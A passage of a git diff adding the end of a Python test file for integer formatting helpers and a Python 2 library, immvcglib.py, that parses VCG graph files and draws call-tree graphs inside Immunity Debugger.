+ test("uint16")
+ assert uint16(0xffff) == 0xffff
+ assert uint16(0x12345678) == 0x5678
+
+ test("sint16")
+ assert sint16(0xffff) == -1
+ assert sint16(0xffff) == sint16(-1)
+ assert signedshort(0xffff) == -1 #DEPRECATED
+
+ test("sint32")
+ assert sint32(-1) == -1
+ assert big2int(0x123456789) == 0x23456789 #DEPRECATED
+
+ test("uintfmt_bits")
+ assert uintfmt_bits(32, 0x12345678) == '0x12345678'
+ assert uintfmt_bits(32, 0x1234) == '0x00001234'
+ assert uintfmt_bits(24, 0x1234) == '0x00001234'
+ assert uintfmt_bits(16, 0x1234) == '0x1234'
+
+ test("uint16fmt")
+ assert uint16fmt(0x123456) == '0x3456'
+ assert uint16fmt(-0x123456) == '0xcbaa'
+
+ test("uint32fmt")
+ assert uint32fmt(0x1234) == '0x00001234'
+
+ test("uint64fmt")
+ assert uint64fmt(0x12345678) == '0x0000000012345678'
+ assert uint64fmt(-1) == '0xffffffffffffffff'
+
+ test("sint16fmt")
+ assert sint16fmt(0x1234) == '0x1234'
+ assert sint16fmt(-0x1234) == '-0x1234'
+ assert sint16fmt(-0x12345678) == '-0x5678'
+ # TODO check that
+ #assert sint16fmt(0xffff) == '-0x0001'
+
+ test("sint32fmt")
+ assert sint32fmt(0x1234) == '0x00001234'
+ assert sint32fmt(-0x1234) == '-0x00001234'
+
+ test("sint64fmt")
+ assert sint64fmt(-1) == '-0x0000000000000001'
+
+ test("byteswap_32")
+ assert byteswap_32(0x12345678) == 0x78563412
+
+ test("byteswap_64")
+ assert byteswap_64(0x1234567890123456) == 0x5634129078563412
+
+ #print "0f=%s"%uint8fmt(0xf)
+ assert uint8fmt(0x0f) == '0x0f'
+
+ print "done."
diff --git a/1.73/Libs/immvcglib.py b/1.73/Libs/immvcglib.py
new file mode 100755
index 0000000..f0cc79a
--- /dev/null
+++ b/1.73/Libs/immvcglib.py
@@ -0,0 +1,1329 @@
+#!/usr/bin/env python
+
+"""
+Reads vcg buffer and creates the graph using Immunity Debugger lib
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+"""
+
+__VERSION__ = '1.2'
+
+
+"""
+NOTES:
+need to divide graph in layers
+save max layer in graph
+every set of childs [unique and different part vertex] E a different layer
+save vertex of layer in each layer
+mark blank path points in each layer [i preffer path points to dummy vertices]
+
+for layer in layers:
+ move east and west vertices, depending on their type *
+
+pathfinder(graph)
+ search empy spots where edge lines might travel
+
+
+a cool thing might be mark the whole graph as east-slanted or west-slanted, according the graph
+the n east or n west it will move
+
+if the graph is slanting too much to east from center point, we can start thinking on going west
+that can be too fuzzy, but will try to make an aproach for human eye
+
+
+new lib against old lib:
+orphan vertices from old lib has been solved, now every vertex has at least 1 relationship saved
+parent<->child type of vertex are correctly relationed now
+
+"""
+
+import graphclass
+
+import immlib
+import debugger
+#chaos is our friend
+# XXX: Sure .. but how does chaos theory relate to random human interaction?
+# XXX: Chance meetings that ultimately end up derailing your life ..
+# XXX: The butterfly effect of hello's .. I don't know .. do you?
+from random import randint
+
+# default GRAPH palette
+PALETTE = []
+
+PALETTE.append("manhattan_edges: yes\r\n")
+PALETTE.append("layoutalgorithm: mindepth\r\n")
+PALETTE.append("finetuning: no\r\n")
+PALETTE.append("layout_downfactor: 100\r\n")
+PALETTE.append("layout_upfactor: 0\r\n")
+PALETTE.append("layout_nearfactor: 0\r\n")
+PALETTE.append("xlspace: 12\r\n")
+PALETTE.append("yspace: 30\r\n")
+PALETTE.append("colorentry 32: 0 0 0\r\n")
+PALETTE.append("colorentry 33: 0 0 255\r\n")
+PALETTE.append("colorentry 34: 0 0 255\r\n")
+PALETTE.append("colorentry 35: 128 128 128\r\n")
+PALETTE.append("colorentry 36: 128 128 128\r\n")
+PALETTE.append("colorentry 37: 0 0 128\r\n")
+PALETTE.append("colorentry 38: 0 0 128\r\n")
+PALETTE.append("colorentry 39: 0 0 255\r\n")
+PALETTE.append("colorentry 40: 0 0 255\r\n")
+PALETTE.append("colorentry 41: 0 0 128\r\n")
+PALETTE.append("colorentry 42: 0 128 0\r\n")
+PALETTE.append("colorentry 43: 0 255 0\r\n")
+PALETTE.append("colorentry 44: 0 128 0\r\n")
+PALETTE.append("colorentry 45: 255 128 0\r\n")
+PALETTE.append("colorentry 46: 0 128 0\r\n")
+PALETTE.append("colorentry 47: 128 128 255\r\n")
+PALETTE.append("colorentry 48: 255 0 0\r\n")
+PALETTE.append("colorentry 49: 128 128 0\r\n")
+PALETTE.append("colorentry 50: 1 1 1\r\n")
+PALETTE.append("colorentry 51: 192 192 192\r\n")
+PALETTE.append("colorentry 52: 0 0 255\r\n")
+PALETTE.append("colorentry 53: 0 0 255\r\n")
+PALETTE.append("colorentry 54: 0 0 255\r\n")
+PALETTE.append("colorentry 55: 128 128 128\r\n")
+PALETTE.append("colorentry 56: 128 128 255\r\n")
+PALETTE.append("colorentry 57: 0 128 0\r\n")
+PALETTE.append("colorentry 58: 0 0 128\r\n")
+PALETTE.append("colorentry 59: 0 0 255\r\n")
+PALETTE.append("colorentry 60: 128 0 128\r\n")
+PALETTE.append("colorentry 61: 0 128 0\r\n")
+PALETTE.append("colorentry 62: 0 128 0\r\n")
+PALETTE.append("colorentry 63: 0 128 64\r\n")
+PALETTE.append("colorentry 64: 0 0 128\r\n")
+PALETTE.append("colorentry 65: 0 0 128\r\n")
+PALETTE.append("colorentry 66: 255 0 255\r\n")
+PALETTE.append("colorentry 67: 128 128 0\r\n")
+PALETTE.append("colorentry 68: 0 0 128\r\n")
+PALETTE.append("colorentry 69: 0 0 255\r\n")
+PALETTE.append("colorentry 70: 0 0 128\r\n")
+PALETTE.append("colorentry 71: 0 0 255\r\n")
+PALETTE.append("colorentry 72: 0 0 0\r\n")
+PALETTE.append("colorentry 73: 255 255 255\r\n")
+PALETTE.append("colorentry 74: 192 192 192\r\n")
+PALETTE.append("colorentry 75: 0 255 255\r\n")
+PALETTE.append("colorentry 76: 0 0 0\r\n")
+PALETTE.append("colorentry 77: 128 0 0\r\n")
+PALETTE.append("colorentry 78: 128 128 128\r\n")
+PALETTE.append("colorentry 79: 128 128 0\r\n")
+PALETTE.append("colorentry 80: 255 0 255\r\n")
+PALETTE.append("colorentry 81: 0 0 0\r\n")
+PALETTE.append("colorentry 82: 0 0 255\r\n")
+PALETTE.append("colorentry 83: 0 0 0\r\n")
+
+class graphTree:
+ # address to call tree from, ID immlib.Debugger() object
+ def __init__(self, address, imm):
+ """ Init the graphing object """
+ self.imm = imm
+ self.callTree = imm.getCallTree(address)
+ self.address = address
+
+ def orderNodesFromTree(self):
+ """ return a call ordered list of nodes """
+
+ # call[0] -> line number in column
+ # call[1] -> dummy (must be 1)
+ # call[2] -> type (set of TY_xxx)
+ # call[3] -> entry (address of function)
+ # call[4] -> from (address of calling function)
+ # call[5] -> calls to (address of called subfunction)
+
+ # so really for now we just do up and down for the first entry
+ TARGET = []
+ PARENTS = []
+ CHILDREN = []
+
+ for call in self.callTree:
+ if call[3]:
+ if "0x%X"%call[3] not in TARGET:
+ TARGET.append("0x%X"% call[3])
+ if call[4]:
+ if "0x%X"%call[4] not in PARENTS:
+ PARENTS.append("0x%X"% call[4])
+ if call[5]:
+ if "0x%X"%call[5] not in CHILDREN:
+ CHILDREN.append("0x%X"% call[5])
+
+ return TARGET, PARENTS, CHILDREN
+
+ def makeNode(self, title, content = "", vertical_order = 0):
+ """ build a simple node VCG buf entry """
+ node = []
+ node.append('node: {\r\n')
+ node.append('title: "%s"\r\n'% title)
+ node.append('vertical_order: %d\r\n'% vertical_order)
+ if content != "":
+ node.append('label: "\x0c69%s\x0c31\r\n%s"\r\n'% (title, content))
+ else:
+ node.append('label: "\x0c69%s\x0c31\r\n'% title)
+ node.append('}\r\n')
+ return node
+
+ def makeEdge(self, source, target, label = "", color = "green"):
+ """ work out the relations between the boxies """
+ # we call these 'edges', edges basically connect the boxies
+ edge = []
+
+ edge.append('edge: {\r\n')
+ edge.append('sourcename: "%s"\r\n'% source)
+ edge.append('targetname: "%s"\r\n'% target)
+ if label != "":
+ edge.append('label: "%s"\r\n'% label)
+ edge.append('color: %s\r\n'% color)
+ edge.append('}\r\n')
+
+ return edge
+
+ def makeVCG(self, title, nodes = [], edges = []):
+ """ build a simple node tree VCG buffer """
+ vcg = []
+
+ vcg.append('graph: {\r\n')
+ # XXX: dummy title (0xaddress) so parser doesn't choke .. fix that
+ vcg.append('title: "%s"\r\n'% title)
+
+ # add default palette
+ for line in PALETTE:
+ vcg.append(line)
+
+ # add nodes, nodes is a list of node entries
+ for node in nodes:
+ for line in node:
+ vcg.append(line)
+
+ # work out the relations from the call tree
+ for edge in edges:
+ for line in edge:
+ vcg.append(line)
+
+ # close the graph
+ vcg.append('}\r\n')
+
+ return vcg
+
+ def graphCallTree(self):
+ """ pop up a call tree graph for this address """
+ TARGET, PARENTS, CHILDREN = self.orderNodesFromTree()
+
+ nodes = []
+ unique = []
+ # make sure we don't double up on nodes ..
+ for title in TARGET+PARENTS+CHILDREN:
+ if title not in unique:
+ unique.append(title)
+
+ # make nodes for all the entries
+ for title in unique:
+
+ if title in PARENTS:
+ order = 0
+ if title in TARGET:
+ order = 1
+ if title in CHILDREN:
+ order = 2
+
+ # try to resolve to symbol using decodeAddress()
+ node_content = self.imm.decodeAddress(int(title, 16))
+ nodes.append(self.makeNode(title, content = node_content, vertical_order = order))
+
+ edges = []
+ # we want to connect all the parents to the target and the target to all the children
+ target = TARGET[0]
+
+ for parent in PARENTS:
+ ### makeEdge(source-node, target-node)
+ edges.append(self.makeEdge(parent, target))
+ for child in CHILDREN:
+ edges.append(self.makeEdge(target, child))
+
+ # make the main VCG
+ vcg = self.makeVCG("Call Graph <-for-> %s [0x%X]"% (self.imm.decodeAddress(self.address), self.address), nodes, edges)
+
+ # XXX: debug write out
+ fd = open("CALLTREE.vcg", "w")
+ for line in vcg:
+ fd.write(line)
+ fd.close()
+
+ # pop up the MDI window
+ generateGraphFromBuf(vcg)
+
+class ParseVCGList:
+ """ recursive VCG parser """
+
+ def __init__(self, vcgList):
+ """ pre-process our shiznit """
+ self.sep = '!SEP!'
+ self.DEBUG = False
+
+ # XXX: need to implement the full VCG grammar at some point
+ # XXX: also see http://www.penguin-soft.com/penguin/man/1/vcg.html
+
+ # WHEN MOVING TO MORE COMPLEX VCG, ADD FUNCTIONALITY _HERE_
+ self.MODETOKENS = [ 'graph:', 'node:', 'edge:' ]
+
+ self.VARTOKENS = [ 'title:', 'label:', 'vertical_order:', 'horizontal_order:', 'manhattan_edges:', 'layoutalgorithm:' ]
+ self.VARTOKENS += [ 'finetuning:', 'layout_downfactor:', 'layout_upfactor:' ]
+ self.VARTOKENS += [ 'layout_nearfactor:', 'xlspace:', 'yspace:' ]
+ self.VARTOKENS += [ 'sourcename:', 'targetname:', 'color:' ]
+
+ # strip comment lines ...
+ cleanVCG = []
+ # in string mode we don't want to replace ..
+ sMode = False
+
+ for line in vcgList:
+
+ # skip comments ...
+ if line[:2] == "//":
+ continue
+
+ clean = []
+ lineList = list(line)
+
+ for c in lineList:
+ if c == '"':
+ # flip pre-process mode
+ sMode = not sMode
+
+ if sMode == True: # string mode open
+ clean.append(c)
+ else:
+ if c in ['\r']: # stripped chars ..
+ continue
+ if c in ['\n', ' ']:
+ clean.append(self.sep)
+ else:
+ clean.append(c)
+
+ line = ''.join(clean)
+
+ if len(line):
+ cleanVCG.append(line)
+
+ self.vcgText = ''.join(cleanVCG)
+
+ self.nodeList = []
+ self.edgeList = []
+ self.graphList = []
+
+ self.lastMode = ""
+
+ def error(self, error):
+ """ raise an error exception """
+ raise error
+
+ def reParse(self, vcgItems, mode = ""):
+ """ used for recursive parse """
+
+ # DEBUG LOGS
+ if self.DEBUG:
+ logger = immlib.Debugger()
+ logger.Log(repr(vcgItems))
+
+ # if not empty == True .. recursive calls .. bla bla
+ if vcgItems:
+
+ if vcgItems[0] in self.MODETOKENS:
+ mode = vcgItems[0]
+ self.lastMode = mode
+ self.reParse(vcgItems[1:], mode = mode)
+
+ elif vcgItems[0] in self.VARTOKENS or 'colorentry' in vcgItems[0]:
+
+ ### Special case color entry ...
+ if 'colorentry' in vcgItems[0]:
+ vcgItems[0] = " ".join([vcgItems[0], vcgItems[1]])
+ del vcgItems[1]
+
+ args = []
+ key = vcgItems[0]
+
+ i = 1
+ while vcgItems[i] not in self.VARTOKENS and vcgItems[i] not in self.MODETOKENS and 'colorentry' not in vcgItems[i]:
+ if '}' in vcgItems[i]:
+ break
+ args.append(vcgItems[i])
+ i += 1
+
+ if mode == 'node:' and len(self.nodeList):
+ self.nodeList[len(self.nodeList)-1][key] = " ".join(args)
+
+ if mode == 'edge:' and len(self.edgeList):
+ self.edgeList[len(self.edgeList)-1][key] = " ".join(args)
+
+ if mode == 'graph:' and len(self.graphList):
+ self.graphList[len(self.graphList)-1][key] = " ".join(args)
+
+ self.reParse(vcgItems[i:], mode = self.lastMode)
+
+ elif '{' in vcgItems[0]:
+
+ # decide if mode needs a new dict .. or if it's just a pair: val
+ if mode == 'graph:':
+ self.graphList.append({})
+ elif mode == 'node:':
+ self.nodeList.append({})
+ elif mode == 'edge:':
+ self.edgeList.append({})
+
+ self.reParse(vcgItems[1:], mode = mode)
+
+ # close control block, go up one mode
+ elif '}' in vcgItems[0]:
+ self.reParse(vcgItems[1:], mode = '')
+
+ # all done ..
+ return self.graphList, self.nodeList, self.edgeList
+
+ def parseGraph(self):
+ """ Parse a VCG graph .. not 100% proper .. but proper enough """
+ vcgItems = self.vcgText.split(self.sep)
+ return self.reParse(vcgItems)
+
+def testVCGParse(path):
+ """ test our new VCG parsing logic """
+ vcgList = []
+
+ fd = open(path, 'r')
+ for line in fd:
+ vcgList.append(line)
+ fd.close()
+
+ parser = ParseVCGList(vcgList)
+
+ # these are lists of dicts :> so 1 dict per node/edge/graph
+ graph, nodes, edges = parser.parseGraph()
+
+ logger = immlib.Debugger()
+
+ logger.Log("GRAPH:")
+ for gDict in graph:
+ for key in gDict:
+ logger.Log("KeyVal: %s"% key)
+ logger.Log(repr(gDict[key]))
+ logger.Log("EDGES:")
+ for eDict in edges:
+ for key in eDict:
+ logger.Log("KeyVal: %s"% key)
+ logger.Log(repr(eDict[key]))
+ logger.Log("NODES:")
+ for nDict in nodes:
+ for key in nDict:
+ logger.Log("KeyVal: %s"% key)
+ logger.Log(repr(nDict[key]))
+
+ return
+
+# re-done for new parser code
+def generateGraphFromBuf(buf):
+ # XXX: the new parser returns 3 lists of dicts .. for the graph, nodes, and edges
+ # XXX: so then you can just go 'for nodeDict in nodes: handleNode(nodeDict)' etc.
+ # XXX: the new parser doesn't care about specific filelayouts and uses recursion
+
+ parser = ParseVCGList(buf)
+ # these are lists of dicts :> so 1 dict per node/edge/graph
+ GRAPH, NODES, EDGES = parser.parseGraph()
+
+ # 1. get the graph title (assuming only one VCG graph per .vcg)
+ title = GRAPH[0]['title:']
+
+ # 2. get the start address
+ try:
+ # XXX: we wanna get rid of splits for parsing eventually :>
+ start_address = title.split("(")[1][:8]
+ except:
+ start_address = "0xcafebabe"
+
+ # DO GRAPHICS MUCK
+ Draw = graphclass.Draw()
+ # Get mdi handler
+ DrawHandler = Draw.createGraphWindow(title, start_address)
+ G = graphclass.Graph()
+ # Link the window handler to our graph
+ G.setHandler(DrawHandler)
+
+ # 3. handle NODES
+ vertices = createVertexList(NODES, DrawHandler)
+
+ # Once we has the vertices and the buffers we can calculate every vertex absolute size
+ for vertex in vertices:
+ vertex.calculateAbsoluteSize(vertex.getVertexBuffer())
+ # Add list of vertex objects to graph instance
+ G.addVertices(vertices)
+ # Create edge list for graph instance + adjlists for vertex instance
+ createAdjacencyList(G, vertices, EDGES)
+
+ """
+ at this point we have:
+ * draw instance [graph window inside debugger]
+ * graph instance
+ * vertex instances list
+ * edges lists + properties [true, false, direct]
+ * vertex instances list
+ * buffers
+ * absolute sizes
+ * adj lists of in and out edges
+ we now need to iterate our lists and define the best way to place
+ vertices
+ """
+
+ # First attempt, place according true/false logic
+ firstAttemptToPlace(vertices)
+ # Was first attempt enough?
+ finalAttemptToPlace(vertices)
+ # Get the new startCoords
+ adjustStartCoords(vertices, G)
+ # Set the bitmap size
+ G.setBitSize(vertices)
+ # Try to get the best path for edges
+ edgelist = pathFinder(vertices)
+ # Draw lines
+ drawEdges(edgelist, DrawHandler)
+ # Draw boxes
+ drawVertices(vertices)
+ ### not here
+ ###checkPlanarity(vertices)
+ # splash the graph onto screen
+ G.splashTime()
+
+
+def generateGraph(address):
+ """ generates a VCG given a function address """
+ try:
+ vcg = generateVCG(address)
+ except:
+ print "[XXX] Error generating VCG"
+ return
+
+ # XXX: replaces old duplicate, duplicating code is bad mmkay
+ generateGraphFromBuf(vcg)
+
+
+def adjustStartCoords(vertices,G):
+ (x,y)=vertices[0].getStartCoords()
+ (h,w)=G.getBitSize()
+ temp=w/2
+ #debugger.Error("%s - %s" % (str(x), str(temp)))
+ for vertex in vertices:
+ vertex.moveEast(x+temp)
+
+
+# handles nodes - re-done for new parser
+def createVertexList(nodes, handler):
+ """ iterate vcg file to get vertex list and vertices's buffers"""
+ vertices = []
+
+ for node in nodes:
+ vertexbuf = []
+ v = graphclass.Vertex(handler)
+
+ logger = immlib.Debugger()
+ # XXX: assuming control chars are always there
+ label = node['label:']
+ content = label[label.find("\x0c31") + 3:]
+ content = content.replace('"', '')
+ label = label[label.find("\x0c69") + 3 : label.find("\x0c31")]
+
+ v.setLabel(label)
+
+ title = node['title:']
+ v.setName(title)
+ vertices.append(v)
+
+ vertexbuf += [v.getLabel()]
+ for key in node:
+ if key not in ['vertical_order:', 'title:', 'label:']:
+ nodeLine = node[key]
+ vertexbuf += [' '.join([key, node[key]])]
+
+ # add content to node box ... strings are kept intact newlines and all by preprocessor
+ content = content.split('\r\n')
+ for line in content:
+ # skip empty lines
+ if len(line):
+ vertexbuf += [line]
+
+ v.setVertexBuffer(vertexbuf)
+
+ return vertices
+
+ #for a in range(15,len(buf)):
+ # if buf[a][:6] == "node: ":
+ # vertexbuf=[]
+ # v=graphclass.Vertex(handler)
+ # v.setLabel(buf[a].split("\"")[3].split("\x0c")[1][2:])
+ # v.setName(buf[a].split("\"")[1])
+ # vertices.append(v)
+ # #fill vertex buffer
+ # vertexbuf+=[v.getLabel()]
+ # #immlib.Error("node: " + v.getName() +" Labeled: " + v.getLabel())
+ #
+ # #if a > 20: #skip options in vcg header
+ # if buf[a][:6] != "node: " and buf[a][:2] != "//" and buf[a][:10] !="colorentry":
+ # if buf[a].find("}") == -1:
+ # vertexbuf+=[buf[a]]
+ # else:
+ # #we dont want to add blank vertexbuf or to a non existant vertex
+ # if vertexbuf and v:
+ # v.setVertexBuffer(vertexbuf[:-1])
+ # vertexbuf=[]
+ #return vertices
+
+def finalAttemptToPlace(vertices):
+ #flag = False
+ #while not flag:
+ #for vertex in vertices:
+ #ret=checkForPlacedVertex(vertex,vertices)
+ #if not ret:
+ #flag = True
+ for a in range(1,15):
+ for vertex in vertices:
+ checkForPlacedVertex(vertex,vertices)
+
+def searchForDummyPathsH2South(edgelist,vertices):
+ templist=edgelist
+ vertexlist=[]
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ for vertex in vertices:
+ (x,y,x2,y2) = vertex.getCoords()
+ #if vertex.getName() == "40fa96":
+ #f.write("%s: xl: %d, yl: %d, x2l: %d, y2l: %d\tx: %d, y: %d, x2: %d, y2: %d\n" % (vertex.getName(), xl, yl, x2l, y2l, x, y , x2, y2))
+ if xl >= x-5 and xl <= x2+5 and yl < y and y2l > y:
+ vertexlist.append(vertex)
+
+ return applyDummyPathsH2South(vertexlist,edgelist)
+
+def searchForDummyPathsH2North(edgelist,vertices):
+ templist=edgelist
+ vertexlist=[]
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ for vertex in vertices:
+ (x,y,x2,y2) = vertex.getCoords()
+ if xl >= x-5 and xl <= x2+5 and yl > y and y2l < y:
+ vertexlist.append(vertex)
+
+ return applyDummyPathsH2North(vertexlist,edgelist)
+
+"""
+NOTES:
+
+if i use an edge templist i might be able to grep off
+the non usefull bendings:
+
+ --|
+ __|
+
+ =>
+
+ |
+ |
+
+another nice thing would be to check wheter im nearest to east or west of
+the overlapped vertex, so i can decide where to escape
+"""
+
+
+def applyDummyPathsH2SouthTrue(vertexlist,edgelist):
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ vertexlist.sort()
+ for vertex in vertexlist:
+ (x,y,x2,y2) = vertex.getCoords()
+ cm = randint(-20,-10)
+
+ if y2l-5 > y and y2l <= y2 and len(vertexlist) == 1: # line overlapp part of vertex, but it doesnt cross all over it
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist[-1] = (( tx,ty,tx2, y-10, color))
+ else:
+ if vertexlist.index(vertex) == 0:
+ edgelist[-1] = ((xl,yl,xl,y-10,color))
+ else:
+ pass
+ #edgelist.append((endx,endy,endx,y-10,color))
+ #edgelist[-1] = ((xl,yl,xl,y-10,color))
+ edgelist.append((xl,y-10,x-10+cm,y-10,color))
+ edgelist.append((x-10+cm,y-10,x-10+cm,y2+10,color))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x-10+cm,y2+10,xl,y2+10,color))
+ endx=xl
+ endy=y2+10
+ #edgelist.append((xl,y2+10,xl,endy,color))
+
+ return edgelist
+
+def applyDummyPathsH2South(vertexlist,edgelist):
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ vertexlist.sort()
+ for vertex in vertexlist:
+ (x,y,x2,y2) = vertex.getCoords()
+ if y2l > y and y2l <= y2 and len(vertexlist) == 1: # line overlapp part of vertex, but it doesnt cross all over it
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist[-1] = (( tx,ty,tx2, y-10, color))
+ else:
+ if vertexlist.index(vertex) == 0:
+ edgelist[-1] = ((xl,yl,xl,y-10,color))
+ else:
+ pass
+ edgelist.append((endx,endy,endx,y-10,color))
+ #edgelist[-1] = ((xl,yl,xl,y-10,color))
+ if x2 - xl < xl -x: # go for the eastern exit
+ cm = randint(-5,5)
+ edgelist.append((xl,y-10,x2+20+cm,y-10,color))
+ edgelist.append((x2+20+cm,y-10,x2+20+cm,y2+10,color))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x2+20+cm,y2+10,xl,y2+10,color))
+ endx=xl
+ endy=y2+10
+ else: #western exit
+ cm = randint(-20,-10)
+ edgelist.append((xl,y-10,x-10+cm,y-10,color))
+ edgelist.append((x-10+cm,y-10,x-10+cm,y2+10,color))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x-10+cm,y2+10,xl,y2+10,color))
+ endx=xl
+ endy=y2+10
+
+ #edgelist.append((xl,y2+10,xl,endy,color))
+
+ return edgelist
+
+
+def applyDummyPathsH2North2(vertexlist,edgelist):
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ vertexlist.sort()
+ vertexlist.reverse()
+ for vertex in vertexlist:
+ (x,y,x2,y2) = vertex.getCoords()
+ if y2l > y and y2l <= y2 and len(vertexlist) == 1: # line overlapp part of vertex, but it doesnt cross all over it
+ pass
+ #(tx,ty,tx2,ty2,color) = edgelist[-1]
+ #edgelist[-1] = (( tx,ty,tx2, y-10, color))
+ else:
+ if vertexlist.index(vertex) == 0:
+ edgelist[-1] = ((xl,yl,xl,y2+10,"Blue"))
+ else:
+ pass
+ edgelist.append((endx,endy,endx,y-10,"Aqua"))
+ #edgelist[-1] = ((xl,yl,xl,y-10,color))
+ #if x2 - xl < xl -x: # go for the eastern exit
+ cm = randint(-5,5)
+ edgelist.append((xl,y2+10,x2+20+cm,y2+10,"red"))
+ edgelist.append((x2+20+cm,y2+10,x2+20+cm,y-10,"Yellow"))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x2+20+cm,y2+10,xl,y2+10,"Maroon"))
+ endx=xl
+ endy=y-10
+
+ #else: #western exit
+ #cm = randint(-5,5)
+ #edgelist.append((xl,y2+10,x-20+cm,y2+10,color))
+ #edgelist.append((x-20+cm,y2+10,x-20+cm,y-10,color))
+ #if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ #edgelist.append((x-20+cm,y2+10,xl,y2+10,color))
+ #endx=xl
+ #endy=y2+10
+ # pass
+
+
+ #edgelist.append((xl,y2+10,xl,endy,color))
+
+ return edgelist
+
+def applyDummyPathsH2North(vertexlist,edgelist):
+ (xl,yl,x2l,y2l,color) = edgelist[-1]
+ vertexlist.sort()
+ vertexlist.reverse()
+ for vertex in vertexlist:
+ (x,y,x2,y2) = vertex.getCoords()
+ if y2l > y and y2l <= y2 and len(vertexlist) == 1: # line overlapp part of vertex, but it doesnt cross all over it
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist[-1] = (( tx,ty,tx2, y-10, color))
+ if vertexlist.index(vertex) == 0:
+ edgelist[-1] = ((xl,yl,xl,y2+10,color))
+ else:
+ edgelist.append((endx,endy,endx,y2+10,color))
+
+ cm = randint(-5,5)
+ if x2 - xl < xl -x: # go for the eastern exit
+ edgelist.append((xl,y2+10,x2+20+cm,y2+10,color))
+ edgelist.append((x2+20+cm,y2+10,x2+20+cm,y-10,color))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x2+20+cm,y-10,xl,y-10,color))
+ endx=xl
+ endy=y-10
+ else:
+ edgelist.append((xl,y2+10,x-20+cm,y2+10,color))
+ edgelist.append((x-20+cm,y2+10,x-20+cm,y-10,color))
+ if vertex != vertexlist[-1]: #leave pathfinder() do the last stroke
+ edgelist.append((x-20+cm,y-10,xl,y-10,color))
+ endx=xl
+ endy=y-10
+
+ return edgelist
+
+
+def searchForDummyPathsW(edgelist,vertices):
+ return
+ (xl,yl,x2l,y2l,a) = edgelist[-1]
+ for vertex in vertices:
+ (x,y,x2,y2) = vertex.getCoords()
+ if xl > x or yl < x2 and x2l > y2:
+ pass
+ else:
+ f=open("ea.txt","w+")
+ f.write("quilombo %s\n" % str(x))
+ f.close()
+ return edgelist
+
+def pathFinder(vertices):
+ """find edge's path
+ To find an endge path we start joining two vertex with 3 basic strokes,
+ A -> B -> C
+ after placing each of this basci strokes we check if it is not overlapping a vertex, if so
+ we decide a alternate path based on dummy blank points
+ A -> A' -> A'' -> B -> C
+ where A' (x2,y2) is the original A (x2,y2) so the next basic stroke B, knows how
+ to keep going
+
+ """
+ """note on adding edges to edgelist:
+ since edgelist will self modify with other functions if pretty important
+ to add relative values and not absolute values.
+ ie: before adding a new edge check the last one, and the new values must be relative to edgelist[-1]
+ """
+ edgelist=[]
+ f=open("edges.txt","w")
+ for vertex in vertices:
+ (x,y,x2,y2) = vertex.getCoords()
+ parentw=vertex.getWidth()
+ parenth=vertex.getHeight()
+ outadj=vertex.getOutAdj()
+ for child in outadj:
+ if child[1] == 1: #true child
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName():
+ if vertex.getName() == vertexchild.getName():
+ # parent = child, then loop in same vertex
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y-1,parentw*1/4+x+chaosmov,parenth+y+5,"darkgreen"))
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y+5,x-14,parenth+y+5,"darkgreen"))
+ edgelist.append((x-14,parenth+y+5,x-14,y-10,"darkgreen"))
+ edgelist.append((x-14,y-10,parentw*1/4+x+chaosmov,y-10,"darkgreen"))
+ edgelist.append((parentw*1/4+x+chaosmov,y-10,parentw*1/4+x+chaosmov,y-1,"darkgreen"))
+ else:
+ (xch,ych,x2ch,y2ch) = vertexchild.getCoords()
+ childw=vertexchild.getWidth()
+ #if x >= xp and x <= x2p:
+ #immlib.Error("%s and %s overlaps LEFT: %d" % (vertex.getName(),vertex2check.getName(),x2p-x))
+
+ #if x2 >= xp and x <= x2p:
+ #immlib.Error("%s and %s overlaps RIGHT" % (vertex.getName(),vertex2check.getName()))
+ f.write("Edge true from %s (%d,%d,%d,%d) to %s (%d,%d,%d,%d)\n" % (vertex.getName(),x,y,x2,y2,vertexchild.getName(),xch,ych,x2ch,y2ch))
+ chaosmov=randint(-5, 0)
+ if (parenth+y-1) > ych-2-25: # go north
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y-1,parentw*1/4+x+chaosmov,parenth+y+5,"Blue"))
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y+5,x-14,parenth+y+5,"Blue"))
+ edgelist.append((x-14,parenth+y+5,x-14,ych-2-20+chaosmov,"Blue"))
+ edgelist=searchForDummyPathsH2North(edgelist,vertices)
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx2,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ if ty2 < y2ch:
+ edgelist.append((tx2,ty2,tx2,ych-2,color)) #last stroke enters from north
+ else:
+ edgelist.append((tx2,ty2,tx2,y2ch-2,color)) # last stroke enters from south
+ #edgelist=searchForDummyPathsH2North(edgelist,vertices)
+ else: # go south
+ #starting line
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y-1,parentw*1/4+x+chaosmov,ych-2-25+chaosmov,"darkgreen"))
+ edgelist=searchForDummyPathsH2South(edgelist,vertices)
+ #bend line #1
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ if ty2 < y2ch:
+ edgelist.append((tx2,ty2,tx2,ych-2,color)) #last stroke enters from north
+ else:
+ edgelist.append((tx2,ty2,tx2,y2ch-2,color)) # last stroke enters from south
